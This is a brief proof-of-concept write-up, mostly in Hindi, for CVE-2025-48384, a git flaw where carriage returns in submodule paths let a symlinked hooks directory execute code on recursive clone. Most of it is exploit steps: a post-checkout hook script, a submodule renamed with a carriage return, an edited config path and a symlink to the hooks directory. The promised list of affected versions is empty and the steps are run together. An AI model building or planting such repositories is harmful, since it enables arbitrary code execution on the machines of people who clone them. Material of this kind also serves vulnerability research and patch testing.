
PoC for CVE-2025-48384
CVE-2025-48384 git में एक अनुचित लिंक समाधान (लिंक अनुसरण) भेद्यता के रूप में सामने आता है। विशेष रूप से, कैरिज रिटर्न वाले फ़ाइलनाम .git/config में ठीक से पार्स नहीं होते हैं, और एक सबमॉड्यूल में स्थित git हुक निष्पादन योग्य को इंगित करने वाले सिमलिंक को सबमॉड्यूल हुक निर्देशिका के रूप में शामिल करने से git clone --recursive के साथ रिपो को क्लोन करने पर मनमाना कोड निष्पादन हो सकता है।
माइक्रोसॉफ्ट विंडोज के लिए Git इस भेद्यता से प्रभावित नहीं है, मुख्य रूप से लिनक्स और मैकओएस पर विशिष्ट git संस्करण असुरक्षित रहते हैं। प्रभावित संस्करण हैं:
post-checkout git हुक बनाएं जो poc रिपो को पुनरावर्ती रूप से क्लोन करने पर कोड निष्पादित करे:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<आपका submodule repo>.git sub के साथ सबमॉड्यूल रिपो जोड़ेंgit mv sub $(printf "sub\r") के साथ एक कैरिज रिटर्न जोड़ेंprintf "\tpath = \"sub\r\"\n" इको करें और मूल पथ हटाएं।ln -s .git/modules/sub/hooks sub